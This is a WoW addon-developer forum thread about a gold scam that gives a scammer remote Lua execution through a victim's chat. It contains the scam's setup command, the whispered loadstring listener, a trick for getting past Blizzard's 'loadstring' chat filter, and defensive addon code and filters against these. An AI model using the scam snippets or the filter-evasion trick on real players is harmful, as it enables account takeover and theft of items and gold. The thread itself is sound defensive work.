
Ketho 07-13-16 11:38 PM

AcceptTrade gold scamming, catching hardware events
 
There have been some gold scams with social engineering involved, if listening to totally shady strangers to run X script could be counted as that.
Would an addon be able to effectively safeguard against that?

https://www.reddit.com/r/wow/comment...h_a_scam_that/
http://us.battle.net/wow/en/forum/topic/20745644941

Run by the victim
Code:

/run RemoveExtraSpaces = RunScript

Whispered to victim
Code:

local f = CreateFrame("Button") f:RegisterEvent("CHAT_MSG_ADDON") f:SetScript("OnEvent", function(_, _, _, msg) pcall(loadstring(msg)) end) RegisterAddonMessagePrefix("somePrefix")

Addon channel
Code:

SendAddonMessage("somePrefix", RemoveExtraSpaces(print("Hello World")), "WHISPER", GetUnitName("target", true))

I tried thinking of a few possible countermeasures:
  • Prehooking AcceptTrade() with additional checks, but Blizzard has it upvalued.
    Maybe it could be still useful to prehook it if the script is not something like TradeFrameTradeButton:Click()
  • Posthooking RemoveExtraSpaces() and checking if the function reference changed, but had to hook RunScript() and DevTools_DumpCommand() instead

So I'm trying to call ReloadUI() to remove the script asap. Unless the culprit was literally standing next to the player :(

But I don't know how to set a secure attribute for key/button presses and right-clicks, so that it would also /reload at the press of any button.
OnKeyDown / OnKeyUp are not able to trigger a hardware event for me.

http://forums.wowace.com/showthread.php?t=20110


Lua Code:

local addonName = ...
local f = CreateFrame("Frame")
local db

local msg = "SafeTrade detected a potential exploit with |cffFFFF00%s|r"
local msg_warn = msg..".\n\nClick anywhere to /reload."
local msg_done = msg.." and /reloaded your UI.\n\nRunning scripts could compromise your character causing the loss of items or gold."

StaticPopupDialogs.SAFETRADE_WARNING = {
    text = "%s",
    button1 = OKAY,
    exclusive = 1, whileDead = 1, showAlert = 1,
}

function f:OnEvent(event, addon)
    if addon == addonName then
        SafeTradeDB = SafeTradeDB or {}
        db = SafeTradeDB -- init savedvars
        if db.warning then
            StaticPopup_Show("SAFETRADE_WARNING", msg_done:format(db.warning))
            db.warning = nil
        end
        self:SetHook("RunScript")

    elseif addon == "Blizzard_DebugTools" then
        self:SetHook("DevTools_DumpCommand")
    end
end

function f:SetHook(func)
    hooksecurefunc(func, function()
        if _G[func] == RemoveExtraSpaces then
            -- reload asap, they cant be that fast ... right?
            db.warning = "RemoveExtraSpaces"
            StaticPopup_Show("SAFETRADE_WARNING", msg_warn:format(db.warning))
            self:CatchHW()
        end
    end)
end

local btn

function f:CatchHW()
    if not btn then
        btn = CreateFrame("Button", nil, nil, "SecureActionButtonTemplate")
        btn:SetAllPoints(UIParent)
        btn:SetAttribute("type", "macro") -- only left-click; how to include right-click?
        btn:SetAttribute("macrotext", "/reload")
        --btn:SetScript("OnKeyDown", ReloadUI) -- does not generate hardware events; any attributes for key presses?

        btn:SetFrameStrata("TOOLTIP")
        btn:SetFrameLevel(1) -- ScriptErrorsFrame/SwatterErrorFrame somehow still is on top (?)
    end
end

f:RegisterEvent("ADDON_LOADED")
f:SetScript("OnEvent", f.OnEvent)

myrroddin 07-13-16 11:58 PM

Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?

Or, if you want to be evil, send that same message back to the source, and scam the scammer?

Ketho 07-14-16 12:18 AM

Quote:

Originally Posted by myrroddin (Post 316387)
Couldn't you check the AddOn message events, see if the incoming message is the malware, and if so, exit out?


That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious :)
Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char

myrroddin 07-14-16 07:02 AM

Yes, during the check/exit phase, you can unregister the prefix. While there is no direct API either natively or with Ace3, I would presume registering "" would do the trick. Wrap it within an if/then so you don't accidentally re-register something you'd want! ;)

While true, the scammer could use a compromised character (of any level), the social hack indicates the scammer would be max level. After all, who'd join a raid group for the moose, if you were being invited by someone level 1-99?

As for hacking the hacker, why not? If the message is the scam, then send the scam right back to the hacker. And if the toon has been compromised, the true owner will get fixed up by Blizzard's customer support.

I don't see any issues with this, but I'm evil.

Lombra 07-14-16 08:45 AM

Why would the scammer themself be listening for incoming addon messages?

AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?

Resike 07-14-16 02:00 PM

Quote:

Originally Posted by Ketho (Post 316389)
That is a good idea, to proactively check any incoming addon or chat messages for anything suspicious :)
Would it also be possible to unregister an addon prefix?

Scamming the scammer would be nice if that was even possible, sounds a bit like digital warfare; but they might use a compromised or level 1 char

Wouldn't work, the "CHAT_MSG_ADDON" event gets executed in some kinda order and if the malware is faster then you're still fucked.

Kanegasi 07-14-16 03:37 PM

What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.

Ketho 07-14-16 05:17 PM

Quote:

Originally Posted by Lombra (Post 316398)
AcceptTrade doesn't require a hardware event? That is terrible. Or are they being tricked into executing that somehow?


Yes, they are being tricked into executing that by catching any hardware events with a secure frame
I don't know how exactly they do that, but I could only manage catching any left-clicks

Quote:

Originally Posted by Kanegasi (Post 316408)
What about something like saving AcceptTrade() into a local object, wiping the main one to nil, then setting TradeFrameTradeButton's onclick script to call the local object. That way, a trade is accepted only if the Trade UI's confirm button is clicked.


Good idea. Or maybe without wiping the global one to nil, to not break any other Trade UI related addons.
Lua Code:

local oldAcceptTrade = AcceptTrade

function AcceptTrade()
    if RunScript ~= RemoveExtraSpaces then
        oldAcceptTrade()
    end
end

TradeFrameTradeButton:SetScript("OnClick", AcceptTrade)

It might be really obvious, but why is RemoveExtraSpaces not a local scope function :confused: It's only being used in ChatFrame.lua

@Resike: So there is no way to stop an addon message before it already has done the damage?


Edit: It looks like Blizzard is already checking for any suspicious whisper messages?



It's not possible to say "loadstring" anymore in chat channels, including whisper

But they could still whisper something like
Lua Code:

pcall(_G["load".."string"](msg))
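
The point from Ketho's edit above, as an added example that is not part of the thread: a filter that looks for the literal word loadstring misses the concatenated form, so this pure-Lua check joins adjacent string literals before matching. `SENSITIVE`, `naive`, `normalize` and `scan` are hypothetical names and the sample messages are constructed.

```lua
-- Added example, not code from the thread. Pure Lua 5.1, no WoW API calls.
-- SENSITIVE, naive, normalize and scan are hypothetical names.

-- Names that turn message text into running code, or that this scam touches.
local SENSITIVE = { "loadstring", "runscript", "removeextraspaces", "accepttrade" }

-- A literal-word filter, for comparison.
local function naive(msg)
    return msg:find("loadstring", 1, true) ~= nil
end

-- Join adjacent string literals so "load".."string" reads as "loadstring".
local function normalize(msg)
    local joined = msg:gsub("[\"']%s*%.%.%s*[\"']", "")
    return joined:lower()
end

-- Return every sensitive name found after normalization.
local function scan(msg)
    local text, hits = normalize(msg), {}
    for _, name in ipairs(SENSITIVE) do
        if text:find(name, 1, true) then hits[#hits + 1] = name end
    end
    return hits
end

-- Constructed sample messages; the second is the form quoted in the post.
local samples = {
    'pcall(loadstring(msg))',
    'pcall(_G["load".."string"](msg))',
    "pcall(_G['lo' .. 'ad'..'str' .. 'ing'](msg))",
    '/run RemoveExtraSpaces = RunScript',
    'LF2M heroic, need tank and healer',
}
for _, msg in ipairs(samples) do
    local hits = table.concat(scan(msg), ",")
    print(("naive=%-5s scan=%-30s %s"):format(tostring(naive(msg)), hits, msg))
end
```

The second and third samples show `naive=false` while `scan` still reports `loadstring`. The match is a heuristic over message text, so it complements the function-level guards in this thread and does not replace them.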

Resike 07-14-16 06:38 PM

Quote:

Originally Posted by Ketho (Post 316410)
@Resike: So there is no way to stop an addon message before it already has done the damage?

I'm not sure how it works; it could be served alphabetically or based on the time when the event is registered, or a combination of these two; it could even be serving faster/smaller functions first and the bigger ones later. It's especially hard to reverse engineer if the code doesn't come from an addon but from an in-game script.

SDPhantom 07-15-16 10:40 AM

When it comes to the chat system, there are many attack vectors they can eventually move to with ease. One thing that can be done is completely nullify the RunScript() and DevTools_DumpCommand() functions while a chat event is being handled.

Lua Code:

-- Globals to disable while a chat event is being handled
local FuncList={
    "RunScript";
    "DevTools_DumpCommand";
};

-- Original references, keyed by global name
local FuncCache={};
for k,v in ipairs(FuncList) do FuncCache[v]=_G[v]; end

local function DummyFunc() end
local OldHandler=ChatFrame_OnEvent;
local InChatEvent=false;

-- Pick up functions defined by load-on-demand addons (e.g. Blizzard_DebugTools)
local EventFrame=CreateFrame("Frame");
EventFrame:RegisterEvent("ADDON_LOADED");
EventFrame:SetScript("OnEvent",function()
    for k,v in ipairs(FuncList) do
        if not FuncCache[v] then
            FuncCache[v]=_G[v];
            if InChatEvent then _G[v]=DummyFunc; end
        end
    end
end);

function ChatFrame_OnEvent(...)
    for k,v in pairs(FuncCache) do _G[k]=DummyFunc; end
    InChatEvent=true;
    -- pcall so the real functions are restored even if the chat handler errors
    local ok,err=pcall(OldHandler,...);
    InChatEvent=false;
    for k,v in pairs(FuncCache) do _G[k]=v; end
    if not ok then error(err,0); end
end

To protect more functions, add them to the FuncList table.

